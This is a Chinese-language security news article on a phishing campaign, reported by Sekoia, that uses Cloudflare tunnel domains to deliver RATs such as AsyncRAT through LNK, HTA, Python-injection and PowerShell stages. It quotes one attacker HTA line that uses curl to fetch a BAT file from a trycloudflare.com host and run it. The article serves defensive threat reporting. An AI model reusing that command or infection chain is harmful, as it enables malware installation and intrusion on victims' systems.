網(wǎng)絡(luò)安全專家發(fā)現(xiàn)一起復(fù)雜攻擊活動(dòng)，攻擊者利用Cloudflare的隧道基礎(chǔ)設(shè)施分發(fā)多種遠(yuǎn)程訪問(wèn)木馬（RAT）。

該基礎(chǔ)設(shè)施自2024年2月以來(lái)展現(xiàn)出極強(qiáng)的持久性，作為惡意文件和木馬的分發(fā)平臺(tái)，使攻擊者能夠未經(jīng)授權(quán)訪問(wèn)受害者系統(tǒng)。

包括Forcepoint、Fortinet、Orange和Proofpoint在內(nèi)的安全廠商已記錄這一持續(xù)性威脅，強(qiáng)調(diào)其不斷演變的特性以及對(duì)全球組織日益增長(zhǎng)的影響。

初始感染途徑

主要感染途徑始于包含惡意附件的釣魚郵件，這些附件偽裝成發(fā)票或訂單文件。

這類郵件通常制造虛假緊迫感，并可能包含偽造的對(duì)話記錄和回復(fù)以顯得真實(shí)可信。

附件通常采用"application/windows-library+xml"文件格式，由于相比二進(jìn)制文件看似無(wú)害，經(jīng)常能繞過(guò)電子郵件安全網(wǎng)關(guān)。

當(dāng)用戶打開文件時(shí)，會(huì)建立與托管在Cloudflare隧道基礎(chǔ)設(shè)施上的遠(yuǎn)程WebDav資源的連接。

攻擊基礎(chǔ)設(shè)施分析

Sekoia威脅檢測(cè)與研究（TDR）團(tuán)隊(duì)持續(xù)監(jiān)控這一攻擊基礎(chǔ)設(shè)施，內(nèi)部代號(hào)為"Cloudflare隧道基礎(chǔ)設(shè)施傳播多種RAT"。

分析顯示，攻擊采用復(fù)雜的多階段感染鏈，運(yùn)用多種混淆技術(shù)規(guī)避檢測(cè)系統(tǒng)。這種復(fù)雜性表明，即便在2025年，威脅行為體仍在開發(fā)創(chuàng)新方法來(lái)繞過(guò)現(xiàn)代安全控制措施。

攻擊者利用帶有"trycloudflare.com"后綴的域名（如"malawi-light-pill-bolt.trycloudflare.com"和"players-time-corresponding-th.trycloudflare.com"等）托管惡意內(nèi)容。該基礎(chǔ)設(shè)施最終投放的載荷會(huì)在受感染系統(tǒng)上建立持久遠(yuǎn)程訪問(wèn)，可能導(dǎo)致數(shù)據(jù)竊取和進(jìn)一步網(wǎng)絡(luò)入侵。

感染鏈技術(shù)細(xì)節(jié)

感染過(guò)程始于用戶與偽裝成PDF文檔的LNK文件交互。該快捷方式并非打開合法文檔，而是從同一遠(yuǎn)程服務(wù)器執(zhí)行HTA文件。HTA內(nèi)容揭示攻擊進(jìn)展：

`Set oShell = CreateObject("WScript.Shell") oShell.Run "cmd. exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false self. Close`

此腳本觸發(fā)BAT文件安裝Python并執(zhí)行混淆的Python代碼，隨后將下一階段載荷注入"notepad.exe"進(jìn)程。

注入notepad.exe進(jìn)程（來(lái)源：Sekoia）

為實(shí)現(xiàn)持久化，惡意軟件創(chuàng)建啟動(dòng)項(xiàng)，包含兩個(gè)VBS文件和另一個(gè)放置在Windows啟動(dòng)文件夾中的BAT文件。

最終階段使用PowerShell反射加載從JPEG圖像下載的載荷（內(nèi)含base64編碼的載荷），通過(guò)"duckdns.org"等動(dòng)態(tài)DNS服務(wù)建立與命令控制服務(wù)器的RAT連接。

感染鏈?zhǔn)疽鈭D（來(lái)源：Sekoia）

通過(guò)涉及Windows-library文件、LNK文件、HTA執(zhí)行和Python注入的復(fù)雜多階段過(guò)程分發(fā)AsyncRAT的感染鏈

該攻擊活動(dòng)的演變表明，威脅行為體持續(xù)調(diào)整技術(shù)以繞過(guò)安全控制，凸顯了采用多層檢測(cè)方法和持續(xù)監(jiān)控類似攻擊模式的重要性。